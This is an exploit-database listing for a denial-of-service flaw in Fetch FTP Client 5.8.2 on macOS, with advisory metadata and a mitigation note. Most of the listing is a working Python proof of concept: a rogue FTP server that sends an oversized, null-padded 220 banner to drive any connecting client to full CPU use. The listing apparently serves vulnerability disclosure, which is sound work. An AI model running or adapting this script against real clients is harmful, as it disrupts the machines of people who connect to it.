Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)

vendor:

Fetch FTP Client

by:

liquidworm

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Fetch FTP Client

Affected Version From: 5.8.2 (5K1354)

Affected Version To: 5.8.2 (5K1354)

Patch Exists: YES

Related CWE:

CPE: a:fetch_softworks:fetch_ftp_client

Metasploit:

Other Scripts:

Platforms Tested: macOS Monterey 12.2, macOS Big Sur 11.6.2

2022

Fetch Softworks Fetch FTP Client 5.8 – Remote CPU Consumption (Denial of Service)

The application is prone to a DoS after receiving a long server response (more than 2K bytes) leading to 100% CPU consumption.

Mitigation:

Update to the latest version of Fetch FTP Client

Source

Exploit-DB raw data:

# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm

#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER     PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND
# lqwrm   3498 100.0  0.5 60081236  54488   ??  R     5:44PM   4:28.97 Fetch-5K1354-266470421
# ~/Desktop> 
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
#            macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#

import socket

host = '0.0.0.0'
port = 21

s = socket.socket()
s.bind((host, port))
s.listen(2)

print('Ascolto su', host, 'porta', port, '...')

consumptor  = '220\x20'
consumptor += 'ftp.zeroscience.mk'
consumptor += '\x00' * 0x101E
consumptor += '\x0D\x0A'

while True:
    try:
        c, a = s.accept()
        print('Connessione da', a)
        print('CPU 100%, Memory++')
        c.send(bytes(consumptor, 'UTF-8'))
        c.send(b'Thricer OK, p\'taah\x0A\x0D')
        print(c.recv(17))
    except:
        break